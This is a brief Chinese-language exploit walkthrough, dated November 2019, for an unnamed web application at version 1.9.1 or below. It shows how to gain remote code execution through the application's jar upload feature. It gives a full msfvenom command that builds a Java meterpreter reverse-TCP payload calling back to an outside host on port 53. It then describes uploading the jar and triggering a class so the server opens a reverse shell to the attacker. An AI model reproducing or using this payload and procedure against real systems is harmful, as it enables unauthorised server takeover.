时间2019-11-15
影响范围:<=1.9.1
点击overview,可以看到当前版本,下面演示的是1.8.0
1.先通过msf生成一个jar包
msfvenom -p java/meterpreter/reverse_tcp lhost=1.1.1.1 lport=53 -f jar > msf.jar |
2.按图点击新增,上传一个jar包。
对应数据包如下,结果可以看到这个文件的完整路径。
3.按以下步骤,选择jar包,双击选中类,然后提交给类即可再服务端执行反弹shell。
对应数据包如下
最后就接收到shell了